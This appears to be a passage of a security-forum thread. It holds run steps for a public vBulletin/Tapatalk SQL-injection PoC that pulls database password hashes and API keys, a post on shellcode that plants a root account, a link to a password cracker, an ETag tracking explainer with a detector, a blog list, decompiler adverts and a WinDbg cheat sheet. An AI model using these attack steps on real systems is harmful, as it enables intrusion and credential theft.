see https://github.com/tintinweb/pub/tree/master/pocs/cve-2014-2023

1) prerequisites
   vBulletin 4.x with Tapatalk for vBulletin 4.x installed
2) run PoC
   edit PoC to match your TARGET (, optionally DEBUG=True)
   (optionally) edit your query to extract specific database values
   Note: PoC will try to detect tapatalk on that host
   run PoC
   by default extracts
   * mysql root hash (in case vBulletin db user has permissions to do so)
   * vbulletin db record fields (apikey) - perfectly chains with CVE-2014-2023
   only limited by the vBulletin db_user access permissions

Timeline

2014-01-14: initial vendor contact, no response
2014-02-24: vendor contact, no response
2014-10-13: public disclosure

Contact

tintinweb - https://github.com/tintinweb/pub/tree/master/pocs/cve-2014-2023

Source: https://github.com/tintinweb/pub/tree/master/pocs/cve-2014-2023
  12. I will post them in the Exploits section within the next 10 minutes.
  13. Hi, Because of some security problems with this piece of junk, we decided to remove it. Some members found a few XSS issues in the past, and now an SQL Injection has turned up (not public yet). Screw Tapatalk! Also, about 2 more SQL Injections were discovered in vBulletin, but exploitation is somewhat more difficult. In any case, we have fixed those. Screw vBulletin! We apologize for these problems.
  14. Man, it's a SHELLCODE, not an EXPLOIT!

Use case:
- you are given one exploit (* buffer overflow or something else) in a piece of software that runs as root (ProFTPD, PostFix or whatever). That is REQUIRED!
- you run that exploit using this shellcode, the result being a new account with root permissions. That chmod can be useful under certain conditions.
- you log in nicely over SSH with the new account

Note: after the exploit is executed the process may crash. And in this case you even have this advantage: the process may crash, you already have full access to the server. A backconnect could have been done, for example, but then iptables (firewall) problems come up. Same with port bind. Got it?
  15. Introduction

How do we stay up-to-date with the latest security news? Where do we find the best security solutions to fight malware? Who can we follow to learn about the latest threats and online attacks so that we can protect ourselves?

With security in our minds, no matter whether we are common people or a big company name, we need to understand technology if we want to prevent data loss and privacy breaches. But with so many security blogs out there, which one should we follow?

We have put together a list of security blogs from independent individuals and big names in the IT industry, so that you can benefit from their knowledge and insight. Therefore, if you need best practices, how-to articles, online safety research or the latest security news, feel free to bookmark this article and access it whenever you feel necessary.

The List

1. Krebs on Security
Brian Krebs is the man behind Krebs on Security. Being hacked himself in 2001, he takes a personal interest in online security and is one of the well-known names in today’s security landscape. He covers topics from latest threats, privacy breaches and cyber-criminals to major security news.

2. Schneier on Security
Bruce Schneier is probably the most well-known name that you can recognize in our list, and was even called a “security guru” by The Economist. He wrote books, hundreds of articles, essays and security papers on security matters. At the same time, he is a known figure in the media environment, which recognizes him as an important voice for online security, not only for his knowledge on the matter, but also because he knows how to express his opinions.

3. TaoSecurity
This security blog is run by Richard Bejtlich, Chief Security Officer at Mandiant and author of many books on security. With an extensive background on the cyber-criminal world and malicious attacks on enterprise networks, he shares his experience on digital defense, network monitoring and detection on his security blog. Since a great number of network attacks come from China, he specializes in Chinese online criminals.

4. US-CERT
This is the official website of the Department of Homeland Security, from the USA. Though it is not a classical security blog, its purpose is to improve Internet security by providing specialized and well detailed information on cyber-criminal activities, malware, phishing attempts and online threats. To use their own words: “US-CERT strives for a safer, stronger Internet for all Americans by responding to major incidents, analyzing threats, and exchanging critical cyber-security information with trusted partners around the world.”

5. Dark Reading
Dark Reading is a widely-read cyber security site that addresses professionals from the IT environment, security researchers and technology specialists. They use their experience and knowledge to provide articles, recommendations, news and information on IT security.

6. CIO
CIO is the place where you find news, information technology articles, insight and analysis on major data breaches and online threats. Covering multiple aspects of the world wide web, it provides in-depth, content rich information for IT professionals and normal users.

7. Network Security Blog
Martin McKeay is the voice of this security blog, where you can find information and news on privacy and security issues. As Martin says: “I took up blogging as a means to extend my knowledge and test my ideas about security…”

8. Security Watch with Neil Rubenking
Known for his direct and witty style, Neil Rubenking is the man you have to listen to if you search for technical advice on the main security solutions, from firewalls, antivirus and antispam products to full security suites. Detailed reports and sharp analysis of security programs place him on your follow list if you look for this type of information.

9. Paul’s Security Weekly
Paul’s Security Weekly, founded by Paul Asadoorian, brings you security news, useful technical articles, research studies and valuable information on hacking and cyber-crime through various channels, from blog posts and videos to podcasts.

10. PCMag.com
One of the most popular sites in the software industry, PC Magazine comes with reviews and studies on the latest products for online security. For an objective analysis of a product you may be looking for, don’t forget to look for the dedicated article on this website.

11. Wired
One of the classical North American publications reporting on technology and its role in culture, economy and politics, Wired approaches topics on online privacy, cyber-criminal threats, systems security and the latest alerts.

12. Forbes' Firewall
Forbes' Firewall comes from one of the leading media companies in the online environment and provides strong analysis, reliable tools and real-time reports for cyber-security news and information on the latest online threats.

13. TechRepublic
TechRepublic provides large resources for the online industry, such as blog articles, forums, technical papers and security data. All the valuable information available helps IT professionals and technology leaders to come up with the best decisions on their business processes.

14. Zero Day
The Zero Day security blog is important for all the people who are part of the IT industry and you should follow it to stay up-to-date with the latest security analysis, software vulnerabilities, malware attacks and network threats.

15. Securosis
Securosis is a security research and advisory company that offers security services for companies and organizations. At the same time, you can find on their security blog some useful articles and insight on managing and protecting online data.

16. The Guardian Information Security Hub
Known for its quality articles on world news, Guardian offers a section dedicated to information security for companies and individuals. To stay up-to-date with the latest articles and news on cyber security, make sure you follow this site.

17. Help Net Security
This security site is a popular place for data and security news and you can find here the latest information and articles related to the IT industry.

18. Techworld Security
The section dedicated to security on this site analyzes the latest malware threats and zero-day exploits. You can find here other important topics and subjects, such as security articles, how-to documents and software reviews.

19. Fox IT Security Blog
This security blog is a very good source of information on online security, technology news and cyber crime defense.

20. SC Magazine
SC Magazine comes in the IT environment with technical information and data analysis to fight the present online security threats. Their site provides testing results for e-mail security, mobile devices, cloud and web security.

21. Network Computing
The content of this security blog focuses on cloud technology and enterprise infrastructure systems. Its published articles cover security solutions on how to deliver applications and services for an increasingly large threat environment in the business world, news and expert advice.

22. Infosecurity Magazine
Infosecurity Magazine is an online magazine which covers not only security articles on popular topics, but is also dedicated to security strategy, valuable insights and technical approaches for the online industry.

23. SANS Institute AppSec Blog
This security site addresses the growing malware threats in the online world by providing training, research, certification and educational resources for IT specialists.

24. Threat Track Security
This security blog keeps you up-to-date with the latest innovations and developments in the IT industry, from security exploits to software vulnerabilities and cyber-criminal attempts.

25. CSO Online
CSO focuses on information technology, access management for enterprise servers, loss prevention, cybercriminal threats and software vulnerabilities.

Security blogs from software providers in the IT industry

26. Sophos security blog
Naked Security is Sophos’s award-winning threat news room, giving you news, opinion, advice and research on computer security issues and the latest internet threats. Naked Security is the blog of security company SOPHOS and the place where you can find news, research studies, advice and opinions. Categories range from mobile security threats to operating systems and malware articles. Naked Security is updated multiple times per day and receives around 1.5 million pageviews per month. It has won numerous awards and it is considered one of the best security blogs.

27. Kaspersky Lab’s ThreatPost
Threatpost is the leading security news website that is part of The Kaspersky Lab. Their articles cover important stories and relevant security news for the online world. They are recognized as an important source of news for online security in important newspapers and publications, such as New York Times, USA Today or The Wall Street Journal.

28. Kaspersky Lab’s Securelist
Securelist is a security blog run by Kaspersky Lab and it addresses a large audience, providing some of the best security subjects on cybercriminal activities and data stealing malware. You can find here security information that focuses on malware, phishing and other threats from the cyber security world.

29. Symantec Weblog
Symantec Weblog is a security blog from one of the biggest providers of security solutions world wide, Symantec. Using their technical knowledge and data collected along the years, they come with strong analysis reports and articles on security threats, online criminals, data stealing malware, system vulnerabilities and many others.

30. Google Online Security Blog
We are surrounded by Google products and services, from their search engine to their web browser, so it is normal to include their security blog in our list. It is a reliable security blog and even more, a reference point on online security and privacy we need to acknowledge.

31. Zone Alarm Cyber Security Blog
The security blog from ZoneAlarm, one of the well-known vendors of security products, provides valuable information on malware defense and online security. Using their experience on malware, this security blog generates malware alerts, practical security tips and the latest news in the IT industry.

32. F-Secure Safe & Savvy Blog
A security blog from F-Secure, a company dedicated to online content and privacy protection. On this security blog you will find helpful tips and advice on security issues, from protecting your personal identity to keeping your system safe.

33. HotforSecurity
The security blog from Bitdefender – one of the leading companies on online security solutions, covers various subjects from the IT world, from Internet scams, online spam and phishing to malware and data stealing software.

34. McAfee security blog
McAfee security blog provides the latest tips and techniques from security experts to keep you up-to-date with the latest malware trends in the online environment.

35. Microsoft Malware Protection Center
The Microsoft Malware Protection Center analyzes data from all over the world to provide insight and valuable information on fighting online threats in order to protect users from malware attacks and online crime.

36. SpiderLabs Security Blog
Investigators and researchers at Trustwave cover the latest technology news on this security blog. Gathering information from research and testing, they publish articles and security studies to fight online hackers and cyber-criminal threats.

37. Dell SecureWorks
The security blog from Dell SecureWorks provides the latest news and information for IT professionals and users that need to stay up-to-date with online threats and malware attacks.

38. Malwarebytes Security Blog
The Malwarebytes security blog articles cover the latest malware threats and cyber criminal attempts from the online world. You can find their articles in categories such as cyber-crime, exploits, hacking and malware analysis.

39. Trend Micro Simply Security
Trend Micro Simply Security site offers expert insights on cloud security, data safety, privacy protection and threat intelligence.

40. We Live Security
We Live Security, the ESET blog, is an online resource for cyber security articles and this blog covers a large network of security topics from emerging online threats to zero-day exploits.

Conclusions

We know our list is not perfect, there are so many other security blogs and top influencers in the IT industry that we have not included and we can not assume this list is complete. We try to stay in tune with the latest updates in the industry and we provided a few reasons why you should follow the security blogs above.

But, since the Internet world and the security landscape are changing all the time, so must we. So, help us improve our article, let us know what you think, we have no problem in making changes to our article and improving it for the benefit of all.

Author: Aurelian Neagu
Source: https://heimdalsecurity.com/blog/best-internet-security-blogs/
  16. Yes, interesting idea. Don't bother mass scanning; you need a user and password, you have to authenticate.
  17. General Machine Code to C Decompiler

Free Windows I64 target edition
Interactive Windows GUI

C Decompiler Features

Global Analysis
While function analysis alone provides information of the function’s control flow, only global program analysis can reveal the full details of the function’s interaction with the program.

Type Detection and Propagation
Data types are deduced from operations performed on the data and then propagated and synchronized globally.

Full Data Flow Analysis
Machine code has to work around CPU characteristics like the limited number of registers or operator location restrictions. Full data flow analysis facilitates the elimination of irrelevant data transfers and provides clear and short C code.

Machine Code to C
The low level features of C allow expressing most machine code functions in C. It is not relevant if the function was initially written in C or any other stack frame based language, including Assembler.

Interactive
Static decompilation has its limits and needs user guidance to provide missing context. Interactive manipulations, directly at the source, allow you to guide the decompilation process. E.g. change a function’s ABI to restrict its return value locations or add missing destinations to a computed call.

No Compiler Detection
Global analysis provides the information to make compiler based assumptions obsolete. General compiler patterns are only employed as a last resort to resolve situations where information is missing, e.g. both a called function’s code and its signature are not available.

Function Signatures Library
Detection of known functions from static compiler libraries shortens the decompile process and introduces additional type information. The built-in signature generator enables the user to extend the library with required signatures.

Showcase

Interactive
Selecting a C source code token highlights related tokens and shows the properties of the underlying object in a separate view. Tooltips provide quick information for the token under the mouse pointer.

Context Menus
Context Menus are available in the Source View, Function Tree and the Properties View. They are tailored to the selected token and give quick access to the relevant control actions.

Properties
All relevant details of a selected token are presented in the Properties View.

Issue View
Relevant decompile events are presented by informative Issues and navigation and control actions.

Function Tree
The function tree for navigation and quick access to function control actions.

C/Assembler Mix
The underlying assembler code can be embedded in the generated C code.

Source: C4Decompiler, the C Decompiler for Windows x64
Download: Download C Decompiler for Windows – C4Decompiler.com
  18. Decompile APK. Mark-up your analysis. Leverage our API.

JEB is the most powerful Android app decompiler, built by and for security engineers, and allows them to do their job faster and more efficiently.

Features

See how JEB makes APK decompilation and Android decompilation easy:

Full-fledged Dalvik decompiler. At its core, JEB's unique feature is its ability to directly decompile Dalvik bytecode to Java source code. This approach offers many advantages, as our in-house decompiler is aware of and takes into consideration many Dalvik subtleties, and makes wise use of the metadata present in the DEX file. (See how JEB compares against other tools.)

Interactivity. Analysts need flexible tools, especially when they deal with obfuscated or protected pieces of code. JEB's powerful UI allows you to examine cross-references, rename methods, fields, classes and packages, navigate between code and data, take notes, add inline comments, and more.

Full APK view. Take advantage of the full APK view, including decompressed manifest, resources, certificates, strings, constants, etc. Again, flexibility is key.

API for Automation. Use JEB's Application Programming Interface (API) to write Python scripts and plugins, and automate your analysis needs.

Track your progress. What would hours of research and analysis mean if you or your team couldn't pick up from where you left off? Save your analysis to binary files, track progress through JEB's revision history mechanism.

Technical support. Enjoy our responsiveness. We are also committed to frequent release cycles to make sure JEB stays at the top of its game.

Multi-platform. JEB runs on Windows, Linux and Mac OS.

Read More : http://www.android-d...r.com/index.php
DepositFiles

Screenshots: Interactive Disassembly, Decompiled Java, XML Manifest, Resource Tree, Certificates, A Look at the Options

Source: JEB - The Interactive Android Decompiler - EXETOOLS FORUM
  19. I saw it from you and posted it in Tutorials. It's fine here too; it should be read.
  20. [h=2]Cookieless cookies[/h] There is another obscure way of tracking users without using cookies or even Javascript. It has already been used by numerous websites but few people know of it. This page explains how it works and how to protect yourself. This tracking method works without needing to use: Cookies Javascript LocalStorage/SessionStorage/GlobalStorage Flash, Java or other plugins Your IP address or user agent string Any methods employed by Panopticlick Instead it uses another type of storage that is persistent between browser restarts: caching. Even when you disabled cookies entirely, have Javascript turned off and use a VPN service, this technique will still be able to track you. [h=3]Demonstration[/h] As you read this, you have already been tagged. Sorry. The good news is that I don't link your session id to any personally identifiable information. Here is everything I store about you right now: Number of visits: 2 Last visit: Thu, 09 Oct 2014 15:34:32 +0200 Want to store some text here? (max. 350 characters) Go ahead, type something and store it. Then close your browser and open this page again. Is it still there? Check your cookies, is anything there? Nope, it's all in a fake image checksum that almost noone is aware of. Saw that eye on the right top of the page? That's our tracker. [h=3]So how does this work?[/h] This is a general overview: The ETag shown in the image is a sort of checksum. When the image changes, the checksum changes. So when the browser has the image and knows the checksum, it can send it to the webserver for verification. The webserver then checks whether the image has changed. If it hasn't, the image does not need to be retransmitted and lots of data is saved. Attentive readers might have noticed already how you can use this to track people: the browser sends the information back to the server that it previously received (the ETag). That sounds an awful lot like cookies, doesn't it? 
The server can simply give each browser a unique ETag, and when they connect again it can look it up in its database.

[h=3]Technical stuff (and bugs) specifically about this demo[/h]

To demonstrate how this works without having to use JavaScript, I had to find a piece of information that's relatively unique to you besides this ETag. The image is loaded after the page is loaded, but only the image contains the ETag. How can I display up to date info on the page? Turns out I can't really do that without dynamically updating the page, which requires JavaScript, which I wanted to avoid to show that it can be done without. This chicken and egg problem introduces a few bugs:

- All information you see was from your previous pageload. Press F5 to see updated data.
- When you visit a page where you don't have an ETag (like incognito mode), your session will be emptied. Again, this is only visible when you reload the page.

I did not see a simple solution to these issues. Sure some things can be done, but nothing that other websites would use, and I wanted to keep the code as simple and as close to reality as possible. Note that these bugs normally don't exist when you really want to track someone because then you don't intend to show users that they are being tracked.

[h=3]Source code[/h]

What's a project without source code? Oh right, Microsoft Windows.

https://github.com/lucb1e/cookielesscookies

[h=3]What can we do to stop it?[/h]

One thing I would strongly recommend you to do anytime you visit a page where you want a little more security, is opening a private navigation window and using https exclusively. Doing this single-handedly eliminates attacks like BREACH (the latest https hack), disables any and all tracking cookies that you might have, and also eliminates cache tracking issues like I'm demonstrating on this page. I use this private navigation mode when I do online banking. In Firefox (and I think MSIE too) it's Ctrl+Shift+P, in Chrome it's Ctrl+Shift+N.
Besides that, it depends on your level of paranoia. I currently have no straightforward answer since cache tracking is virtually undetectable, but also because caching itself is useful and saves people (including you) time and money. Website admins will consume less bandwidth (and if you think about it, in the end users are the ones that will have to pay the bill), your pages will load faster, and especially on mobile devices it makes a big difference if you don't have an unlimited 4G plan. It's even worse when you have a high-latency or low-bandwidth connection because you live in a rural area.

If you're very paranoid, it's best to just disable caching altogether. This will stop any such tracking from happening, but I personally don't believe it's worth the downsides.

The Firefox add-on Self-Destructing Cookies has the ability to empty your cache when you're not using your browser for a while. This might be an okay alternative to disabling caching; you can only be tracked during your visit, and they can already do that anyway by following which pages were visited by which IP address, so that's no big deal. Any later visits will appear as from a different user, assuming all other tracking methods have already been prevented.

I'm not aware of any add-on that periodically removes your cache (e.g. once per 72 hours), but there might be. This would be another good alternative for 99% of the users because it has a relatively low performance impact while still limiting the tracking capabilities.

Update: I've heard the Firefox add-on SecretAgent also does ETag overwriting to prevent this kind of tracking method. You can whitelist websites to re-enable caching there while blocking tracking by other domains. It has been confirmed that this add-on stops the tracking. SecretAgent's website.

SOURCE: Lucb1e.com :: Cookieless Cookies
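The ETag mechanism described in the post above can be checked for from the client side. The Python sketch below is an added example, not code from the post or from the lucb1e/cookielesscookies repository; the observation records, host names and function names are constructed for illustration. It flags resources whose ETag differs per client although the content is identical, and shows the request-side mitigation of dropping If-None-Match.

```python
import hashlib
from collections import defaultdict

# Constructed sample data: (client profile, URL, ETag header, response body)
# as recorded by three browsers that each started with an empty cache.
OBSERVATIONS = [
    ("profile-a", "https://site.example/eye.png", '"5f2a9c01"', b"\x89PNG-eye"),
    ("profile-b", "https://site.example/eye.png", '"c7710be4"', b"\x89PNG-eye"),
    ("profile-c", "https://site.example/eye.png", '"09d3e6aa"', b"\x89PNG-eye"),
    ("profile-a", "https://site.example/logo.png", 'W/"v42"', b"\x89PNG-logo"),
    ("profile-b", "https://site.example/logo.png", '"v42"', b"\x89PNG-logo"),
    ("profile-c", "https://site.example/logo.png", '"v42"', b"\x89PNG-logo"),
]


def opaque_tag(etag):
    """Drop the weak-validator prefix so W/"x" and "x" compare equal."""
    etag = etag.strip()
    return etag[2:] if etag.startswith("W/") else etag


def find_per_client_etags(observations):
    """Return {url: sorted ETags} for resources whose ETag varies between
    clients even though every client received byte-identical content."""
    seen = defaultdict(lambda: defaultdict(dict))  # url -> body hash -> client -> tag
    for client, url, etag, body in observations:
        digest = hashlib.sha256(body).hexdigest()
        seen[url][digest][client] = opaque_tag(etag)
    suspicious = {}
    for url, bodies in seen.items():
        for clients in bodies.values():
            tags = set(clients.values())
            # A checksum-like validator depends only on the content, so one body
            # should map to one tag; one tag per client behaves like a cookie.
            if len(clients) > 1 and len(tags) == len(clients):
                suspicious[url] = sorted(tags)
    return suspicious


def strip_validator(request_headers):
    """Mitigation: drop If-None-Match so a stored tag is never sent back."""
    return {k: v for k, v in request_headers.items() if k.lower() != "if-none-match"}


if __name__ == "__main__":
    for url, tags in find_per_client_etags(OBSERVATIONS).items():
        print(url, "->", tags)
```

A hit is a lead rather than proof: some server setups derive ETags from file metadata, so identical content can legitimately carry different tags on different backends.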
  21. I haven't done kernel debugging, but http://alexandreborgesbrazil.files.wordpress.com/2014/03/intro_win_debugging.pdf .
  22. I've started using WinDbg more often (IDA sucks in some respects) and made myself a list of useful commands.

? - Regular commands help
?? expr - Evaluate C++ expression
$$ comment - Add comment
~ - All threads
~. - Current thread
~. k - Current thread stack
~* k - All threads stack

.cls - Clear screen
.help - Display . commands
.hh text - Open Help and search text
.lastevent - Last exception/event
.time - Kernel and user time
.tthread - Thread time
.attach - Attach to process with PID
.detach - Detach from process
.restart - Restart application
.symfix - Set default symbol path
.reload - Reload all symbols
.tlist - List all processes

!Ext.help - General extensions
!Exts.help - Other extensions
!Uext.help - User-mode extensions
!Wdfkd.help - Kernel-mode extensions
!analyze -v - Information about current exception
!threads - Detailed threads info
!address -summary - Memory addresses
!heap -s - Heap info
!runaway - Time of all threads
!teb - Thread Environment Block
!peb - Process Environment Block
!dlls - Loaded modules (+options)
!lmi chrome.dll - Module information
!dh kernel32.dll - Display PE headers and sections
!tls - Thread Local Storage
!gle - Dump last errors (by threads)
!error ERR - Display error text info
!uniqstack - Stack for all threads
!address Addr - Display info about address
!mapped_file Addr - File containing that address

g - Go
gu - Go up (until function complete)
q - End debug session
p - Single step
pt - Step to next return
pc - Step to next call
pa Addr - Step until addr

lm / lmf - Loaded modules
lm vm chrome - Module information
ld * / module - Load symbols
n 10 / 16 - Change number base
x kernel32!Load* - Examine symbols
ln addr - List nearest symbols

k - Stack
kd - Raw stack
kb - Stack with first 3 params
r - Show registers
r eax,ebx - Show some registers
r ecx=0 - Set register value

dt ntdll!_PEB - Display type
dv - Display local variables
da, du - Display ASCII/Unicode memory
db, dw, dd, dq, df - Display byte/word/dword/qword/float memory
db*, dd* - Display dereferenced memory
eb, ew, ed, eq, ef - Edit byte/word/dword/qword/float memory
c, m, f - Compare, move, fill memory
s Addr Size Data - Search data

bl - List breakpoints
bc * - Clear all breakpoints
be / bd - Enable/disable breakpoints
bp Addr - Add breakpoint
bm Sym - Add breakpoint on symbol
ba [rwx] Addr - Break on access
bp mod!addr /1 - Only once
bp mod!addr k - Only triggered after k-1 passes

Maybe someone else will find it useful too.

More commands: http://windbg.info/doc/1-common-cmds.html
A small cheat sheet: https://labs.snort.org/awbo/windbg.txt
  23. Audit != Pentest

Audit: Audit - Wikipedia (also called FINANCIAL AUDIT)
Pentest: Penetration test - Wikipedia, the free encyclopedia

Stop confusing them!
  24. Some of the questions are embarrassing. Really bad. Others have wrong answers.
  25. See here: Firefox password cracker - clean code - Source Codes - rohitab.com - Forums

If you have questions, just ask.